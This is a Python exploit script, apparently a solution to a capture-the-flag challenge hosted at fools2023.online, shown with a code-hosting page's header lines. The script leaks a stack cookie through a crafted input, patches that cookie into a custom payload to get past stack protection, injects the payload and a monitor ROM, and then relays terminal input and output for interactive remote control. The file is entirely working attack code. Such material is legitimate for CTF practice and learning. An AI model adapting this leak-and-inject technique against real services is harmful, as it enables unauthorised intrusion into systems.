You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
53 lines
1.3 KiB
53 lines
1.3 KiB
2 years ago
|
#!/usr/bin/env python3
|
||
|
|
|
||
|
|
from sys import stdin, stdout
|
||
|
|
from binascii import unhexlify
|
||
|
|
import socket
|
||
|
|
import select
|
||
|
|
|
||
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||
|
|
s.connect(("fools2023.online", 13339))
|
||
|
|
|
||
|
|
# Sniff out the stack cookie
|
||
|
|
s.send(unhexlify("f14ff7f150f7f151f7f152f70a"))
|
||
|
|
intro = bytearray()
|
||
|
|
s.settimeout(0.1)
|
||
|
|
while True:
|
||
|
|
try:
|
||
|
|
intro += s.recv(1024)
|
||
|
|
except socket.timeout:
|
||
|
|
break
|
||
|
|
s.settimeout(None)
|
||
|
|
intro = intro.decode()
|
||
|
|
index = intro.find("Welcome, ") + len("Welcome, ")
|
||
|
|
cookie = unhexlify(intro[index:index+8])
|
||
|
|
|
||
|
|
# Patch the stack cookie into the payload
|
||
|
|
code = bytearray(open("../prog/custom/pwninfsrv.prg", "rb").read())
|
||
|
|
offs = len(code) - 0x100
|
||
|
|
code[offs+0] = cookie[0]
|
||
|
|
code[offs+1] = cookie[1]
|
||
|
|
code[offs+2] = cookie[2]
|
||
|
|
code[offs+3] = cookie[3]
|
||
|
|
|
||
|
|
# Send the payload
|
||
|
|
s.send(b"\n")
|
||
|
|
s.send(code)
|
||
|
|
s.send(b"\n")
|
||
|
|
|
||
|
|
# Send the monitor rom
|
||
|
|
monitor = open("../prog/MONITOR.PRG", "rb").read()
|
||
|
|
s.send(monitor[0x1000:])
|
||
|
|
|
||
|
|
# Passthrough input
|
||
|
|
p = select.poll()
|
||
|
|
p.register(stdin.buffer, select.POLLIN | select.POLLPRI)
|
||
|
|
p.register(s, select.POLLIN | select.POLLPRI)
|
||
|
|
while True:
|
||
|
|
for fd, ev in p.poll():
|
||
|
|
if fd == stdin.buffer.fileno():
|
||
|
|
s.send(stdin.buffer.read(1))
|
||
|
|
if fd == s.fileno():
|
||
|
|
stdout.buffer.write(s.recv(1))
|
||
|
|
stdout.buffer.flush()
|